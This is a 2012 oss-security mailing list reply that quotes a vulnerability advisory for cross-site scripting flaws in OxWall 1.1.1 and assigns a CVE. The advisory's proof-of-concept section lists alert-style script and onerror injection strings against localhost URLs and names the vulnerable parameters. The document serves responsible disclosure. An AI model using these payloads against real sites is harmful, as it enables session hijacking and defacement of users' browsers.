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Re: [oss-security] OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities
From: Kurt Seifried <kseifried () redhat com>
Date: Mon, 20 Feb 2012 16:05:38 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 02/20/2012 09:53 AM, YGN Ethical Hacker Group wrote:
1. OVERVIEW OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Oxwall is a free open source software package for building social networks, family sites and collaboration systems. It is a flexible community website engine developed with the aim to provide people with a well-coded, user-friendly software platform for social needs. It is easy to set up, configure and manage Oxwall while you focus on your site idea. We are testing the concept of free open source community software for complete (site,sub-site setups) and partial (widgets,features) community and collaboration solutions for companies and individuals. 3. VULNERABILITY DESCRIPTION Multiple parameters were not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 1.1.1 and lower 5. PROOF-OF-CONCEPT/EXPLOIT URL: http://localhost/Oxwall/join Injected Attack String: '"><script>alert(/XSS/)</script> Method: HTTP POST Vulnerable Parameters: captchaField, email, form_name ,password ,realname ,repeatPassword ,username ------------------------------------------------------------------------------------ URL: http://localhost/Oxwall/contact Injected Attack String: '"><script>alert(/XSS/)</script> Method: HTTP POST Vulnerable Parameters: captcha, email, form_name ,from , subject ------------------------------------------------------------------------------------ URL: http://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E Vulnerable Parameter: tag ---------------------------------------------------------------------------- Vulnerable Parameter: RAW-URI http://localhost/Oxwall/photo/viewlist/tagged/><img src=xs onerror=alert('XSS')> http://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x= http://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x= 6. SOLUTION Upgade to the latest version of Oxwall. 7. VENDOR Oxwall Foundation http://www.oxwall.org/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-06-09: notified vendor 2012-02-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss Oxwall Home Page: http://www.oxwall.org/ #yehg [2012-02-20]
Please use CVE-2012-0872 for these XSS issues. - -- Kurt Seifried Red Hat Security Response Team (SRT) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJPQtHCAAoJEBYNRVNeJnmTiKoP/A9I5fFvOOi9SFbkHWQPTWu/ ID9i4VEPeH+YyGITSjx2J0nC4IaSr30DMemc4XjQqpRUz15KjmQYXapS+hDJXa7f 9XpzUERrQPaghyIJG1X81pj2ONmS9euT31SNtH7iMt+4QD6K7ZOkOFFMSD0ViJS4 +4CrCIyQ26wrmcaZ164JT6WeJNFzmZk1Fp6QMoyclMvQh0pzaN2I7fVb8lUQXI7C V9T3BIfpPVqoVrX69Ki5ojULLJL/EJhXKaAewUwfHsrX/KikFLq530/6x7+wjGXN +/GauH/IO4BB7XytY57sbILcfDwWKJycLbg8D+M/9QO+cp047HQD8AFHDAkTLjCL N2+9ckRyr3z4a5Ou9/Vfa6Fpg50RJ752ErDMOF2GQ4enkf7+LZuHmHmsVKEVUJWI TfxpaTyYLiUTnVPcazz8mqEXSuFw8gkdBGvjQpD3vTlVCNjfPZY3naqC2aWGOu2b VHnIbF/TDoi3oV/7Tu68pFcKeoopVEs3ENmdJagM4qINgs7xw3XtDJuICS1a8A70 DJIsbHeASbbvtpEk0X69WzbC6QJuufhHImEAohfrhww8tZ+lqFkE0esaRBEGNGe2 Hl4sXVCL9UgiGbXYO+VNohpnGAf+eWRL/fhLoBnU906sUkllXTDAfqBv6Ehey8u8 dGs82XRcilij2gX4LabZ =Sh3G -----END PGP SIGNATURE-----
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- OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities YGN Ethical Hacker Group (Feb 20)
- Re: [oss-security] OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities Kurt Seifried (Feb 21)